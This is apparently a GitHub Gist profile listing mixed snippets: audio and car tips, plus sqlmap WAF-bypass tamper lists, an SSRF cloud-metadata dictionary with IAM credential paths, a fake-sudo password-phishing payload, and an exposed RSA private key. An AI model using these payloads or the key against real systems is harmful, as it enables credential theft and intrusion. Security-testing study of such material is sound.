Skip to content

Instantly share code, notes, and snippets.

View duraki's full-sized avatar

duraki

171 followers · 924 following
View GitHub Profile
@duraki
duraki / sqlmap-tamper-scripts-evaluation.md
Created July 4, 2019 12:59 — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY

Below names are to be passed to the --tamper= parameter of sqlmap.

The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.

The scale is 0-5.

@duraki
duraki / cloud_metadata.txt
Created January 7, 2020 22:09 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@duraki
duraki / script.sh
Created April 16, 2020 08:36
The first two statements of your BASH script should be…
#!/usr/bin/env bash
set -euo pipefail
@duraki
duraki / sudo_phishing_payload.sh
Created June 10, 2020 07:54
# Create payload: replace sudo with an alias
payload='
fake_sudo() {
# Simulate a sudo prompt
echo -n "[sudo] password for ${USER}: "
read -s password
echo
# Run your command so you are happy
echo "$password" | sudo -S "$@"
# Do my evil stuff with your password
@duraki
duraki / x.pem
Created August 6, 2020 10:30
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEApyp3B6Jd/yGzmogaq6a1CbEyz5i9EDSTrCWIQuXj+9JPic0LB+Aql3zCCDH3
IJFCOeofrXObVKTWpGvUYGFrk92LR05ZQkrMVV5ZjNPF0mxUqnktyoQte5GvAh9dbwu6b0dMImvr
W85nY7MtpbfYyxvup1YE9YPseGhiJhDtujXmUj5YMgX0wZzW2cNyOwN0dEjK/zFiuTLBvHEW9a82
JbvoKBhK/nMFwB09ZhG5ihfeLcevvoVmTRrHRvJbRqZpuQt6l4vQhUZsAJGPTwsI62M7KRdtqLy7
gLvajWc6DEAXdlD+MsjHW4ikDvWgnUCtPVBLFoK5q1uPAxU3fDNtRwIDAQABAoIBAEEu8tkcPBDn
QFSKq/Ow/rj3yrtecKKoDck7nWWQpRSlznQKazm39IO7lyGA8j9VxQA2RgHpqXEZEcVtcpPeiQdQ
hSXZ7D5IUmMbdknOrj2+FkmfFPb6EY40oYxvVIyfgyQvJgXqFQ1ob7JVxP/wr22Lx8Siay6dMZFG
CreTNE++YPwBDqnJbMZDM9SJb/R+f+2BZFd9OqNe50pADp6pBpOdcSeRw5su+vNl3FB2kxH8G8ob
1COpWk/7esngTRYK30Im0QKJC8wCMafZnJPw92Sx62zmaE+9RXD8tdaqeKbhkJDZfej6YH88NJQs
@duraki
duraki / Fix Kappa headphones on Macbook pro
Last active May 7, 2022 16:42
# => first reboot coreaudiod
$ sudo pkill coreaudiod
$ sudo kill -9 `ps ax | grep 'coreaudiod' | grep -v grep | awk '{print $1}'`
$ sudo defaults read bluetoothaudiod
## 2021-01-11 09:01:55.659 defaults[1519:22962]
## Domain bluetoothaudiod does not exist
# => write defaults
$ sudo defaults write bluetoothaudiod "Apple Bitpool Max" 40
$ sudo defaults write bluetoothaudiod "Disable AAC codec" 1
@duraki
duraki / sqlmap_which_tamper_to_use.txt
Created May 8, 2021 09:35
Best sqlmap tampers to use depending on the DBMS
## MySQL
space2randomblank
unionalltounion
unmagicquotes
versionedkeywords
versionedmorekeywords
xforwardedforbetween
bluecoat
charencode
@duraki
duraki / add_debug_entitlement.sh
Created October 11, 2021 20:29 — forked from talaviram/add_debug_entitlement.sh
Simple Utility Script for allowing debug of hardened macOS apps.
#! /bin/bash
# Simple Utility Script for allowing debug of hardened macOS apps.
# This is useful mostly for plug-in developer that would like keep developing without turning SIP off.
# Credit for idea goes to (McMartin): https://forum.juce.com/t/apple-gatekeeper-notarised-distributables/29952/57?u=ttg
app_path=$1
if [ -z "$app_path" ];
then
echo "You need to specify app to re-codesign!"
exit 0
@duraki
duraki / gist:203e879a5eed987e9d1bdde725367bf6
Created June 17, 2022 18:01
Secrets of the BMW E34
1. If the turn signal switch is pressed in until it is in the most extreme position, the marker on one side (parking marker) will light up.
2. The rear sofa is made so that it can be used as a seat in nature (there is even a carrying handle and the bottom of the sofa is made of plastic).
3. The sun protective blind can turn to the window when the sun is lateral (3D blind).
4. By clicking on the reset daily mileage, you can see the mileage even without a key.
5. In the rear doors in the locks themselves there are latches for children that will not allow a child to open the doors (turn with a key or a screwdriver).
6. By lifting the driver's handle and holding it for 15 seconds, the lock cylinder will warm up.
7.Lifting the driver's handle turns on the interior light.
8. Recirculation of the cabin works even with the engine off (if the goal is additional help, you can sit in the car driving warm air through the cabin through the stove).
9. When you have to carry something dirty in the trunk, you can turn the ca
@duraki
duraki / E34 Wipes Programming.txt
Created June 17, 2022 19:55
E34 Wipes Programming
First, a little theory. The brushes and, accordingly, the switch have 5 main modes of operation of the brushes:
3 - The fastest mode.
2 - Continuous mode (With "nuances". What? Read below!).
1 - Intermittent mode.
0 - Not working (off).